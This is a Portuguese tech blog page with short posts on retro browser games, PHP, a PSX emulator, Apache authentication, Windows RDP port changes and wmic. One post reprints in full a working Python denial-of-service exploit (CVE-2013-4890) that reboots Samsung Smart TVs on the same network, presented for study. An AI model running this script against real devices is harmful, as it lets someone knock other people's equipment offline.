Site Archive.org agora disponibiliza games clássicos para jogar via browser

playing_atari_2600

O site Archive.org conhecido por guardar versões da maioria dos sites da web agora disponibiliza versões em HTML5 de games Asteroids, Donkey Kong, Frogger e Dig Dug.clássicos

Para jogar basta acessar os links abaixo:

1) Asteroids
2) Donkey Kong
3) Frogger
4) Dig Dug

Pura nostalgia!

Como calcular valores monetários no PHP

Para aqueles que estão iniciando e precisam de uma ajudinha para o desenvolvimento daquela aplicação chata que todo mundo precisa fazer quando estão començando utilize os exemplos abaixo para somar valores monetários no PHP

$valor = "25.00";
$multa = "1.50";
$resultado = $valor + $multa;
echo number_format($resultado,2,",",".");
// resultado: 26,50

Exploit para Samsung Smartv possibilita resetar tv pela rede

Segundo os integrantes do site Itsecgames o exploit que eles desenvolveram possiblita resetar aparalhos smartv quando conectados na mesma rede do agressor. O script em Python é simples e usa a biblioteca httplib para explorar a vulnerabilidade da TV. O código para que possa ser analisado para fins de estudo está abaixo:

#!/usr/bin/python

# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
# As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)

import httplib
import sys
import os

print " ***************************************************************************************"
print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print " Exploit: Denial of Service (DoS) attack\n"
print " Description:\n"
print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print " Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print " ***************************************************************************************\n"

# Sends the payload
print " Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# Checks the response
print " Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print " Target down!\n"

 

Instalando e jogando ROMS de PSX com o emulador Sincronicx PCSX

sincronicx_pcsx

O tempo passa mas é sempre bom recordar os grandes jogos de PSX. Jogos como Need For Speed, Marvel Vs Capcom, MK entre outros se consagraram neste console. O hacker Sincronicx fez uma customização e um instalador que possibilita que você jogue suas ROMS de PSX utilizando seu Macbook e um controle Dual Shock de PS3.

Software e hardware necessários:
– Um controle Dual Shock de PS3;
– Uma ROM de PS3;
– Fazer o download do aplicativo Sincronicx PCSX ( download aqui )
– Rodar o instalador SincronicxInstall

Como instalar
1) Primeiramente você precisará do Sincronicx PCSX Pack que pode ser baixado em http://www.4shared.com/file/_DUMvmXf/Sincronicx_PCSX_Pack.html

2) Abra a imagem DMG e vá até a pasta install. Vá até Applications/Utilites e abra o terminal
digite no terminal
sh
e arraste o script install.sh para dentro da janela do terminal. Tecle enter

3) Selecione a opção 1 para instalar o SincronicxPCSX. Depois de instalado configure seu controle Dual Shock com a opção 4
OBS: O tempo médio de instalação é de 10 minutos. O instalador configura o emulador automáticamente e já possui a Bios necessária para rodar os jogos.

Screenshots
pcsx-df1

Se gostarem compartilhem nas redes sociais.

Autênticação em diretório no Apache 2 ( configurando no Ubuntu 13 )

A autênticação padrão no Apache é bem simples de habilitar no Ubuntu. Precisaremos do Apache com os módulos abaixo habilitados para que possamos dar sequência em nossa configuração.

auth_basic_module, authz_user_module, and authn_file_module

Vamos ao passo-a-passo:

1) Abra o terminal de seu Ubuntu e entre com os seguintes comandos abaixo:
# a2enmod auth_basic
# a2enmod authn_file
# a2enmod authz_user

2) Vamos criar o arquivo de autênticação e criar os usuários que terão acesso a nossa pasta autênticada:
# htpasswd -c /etc/apache2/passwords user1
New password: xxx
Re-type new password: xxx
Adding password for user user1
# htpasswd /etc/apache2/passwords user2
New password: xxx
Re-type new password: xxx
Adding password for user user2

3) No arquivo /etc/apache2/site-available/default ( exemplo ), edite o parametro de NameVirtualHost onde deseja autênticar. Siga o exemplo abaixo:


AuthType Basic
AuthName "Secure Content"
AuthBasicProvider file
AuthUserFile /etc/apache2/passwords
Require valid-user

4) Reinicie o servidor apache
/etc/init.d/apache2 restart

Pronto basta testar agora.

Do BOPE ao empreendedorismo

A filosofia do BOPE se aplicada de forma correta serve como ponto de partida para qualquer grande empreendedor. Veja abaixo e imagine sua aplicação

Filosofia
1) Determinar o objetivo -> Missão
2) Planejar -> Estratégias e táticas
3) Preparar a equipe -> Mobilizar
4) Executar o plano -> Disciplina
5) Avaliar resultados -> Confirmar, corrigir e aprender

Regra do 3M
Máximo -> aproveitamento
Máximo -> sucesso
Minímo -> esforço

Alterando a porta TCP do Remote Desktop do Windows

Rescentemente tive um problema para resolver no qual o cliente possuia um roteador modelo D-Link onde não permitia um SNAT com mais de uma regra apontando para a mesma porta privada e com endereços de ip diferentes.

Ilustrando
servidor A -> ip: 192.168.1.1 -> RDP local 3389 -> RDP público 3389
servidor B -> ip: 192.168.1.2 -> RDP local 3389 -> RDP público 3393

O roteador não permitia criar mais de uma regra apontando para a mesma porta. Com isto o que restava a fazer é alterar a porta TCP de uma das máquinas apontando para 3393. Para efetuar este processo siga os passos abaixo:

Entre no registro do Windows, no meu caso um Windows 7 e acesse a seguinte chave

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp\PortNumber

Note que o valor que está cadastrado nesta chave está em hexa, mude para decimal e altere para 3393 conforme nosso exemplo.
Feito isto, feche o regedit.

Se você puder reinicar a máquina simplesmente reinicie o computador para o serviço já subir nesta porta. Do contrário acesse o gerenciador de serviços do Windows e reinicie o serviço chamado “Serviços de Área de trabalho remota

Com isto o serviço já deve estar escutando na porta 3393. Você pode conferir utilizando o comando

netstat -na |more

* procure por uma linha com esta abaixo:

TCP 0.0.0.0:3393 0.0.0.0:0 LISTENING

Se estive em listening significa que está funcionando corretamente. Do contrário não está.

Problemas
Caso você encontre dificuldade no qua a porta 3393 está em listening e mesmo assim não está conseguindo acessar, provavelmente o firewall do Windows está bloqueando esta porta. Para resolver temos que criar uma regra para liberar a porta

Siga o exemplo abaixo:

1) Vá até o painel de controle / Firewall do Windows / Configurações avançadas
2) No menu de configuração do firewall do windows clique em Regras de Saída, e selecione o menu Ação / nova regra
3) Nas opções selecione Porta ( clique em avançar )
4) Selecione TCP, e especifique a porta 3393 no qual queremos liberar e clique em Avançar
5) Salve a regra e feche o gerenciar de firewall

rdp_windows

 

Feito isto sua porta 3393 já deve estar funcionando para acesso ao RDP. Basta criar uma nova regra no router apontando para esta porta TCP

Windows 7: gerando lista de todos os programas instalados no computador em formato CSV

Uma outra ferramenta poderosa para fazer auditoria em máquinas Windows 7 é o comando wmic product. Este comando retorna uma lista de todos os programas instalados no computador de forma simples e eficiente.

Para gerar a relação acesse o terminal e execute o comando

wmic product get /format:csv > Software_%Computername%.csv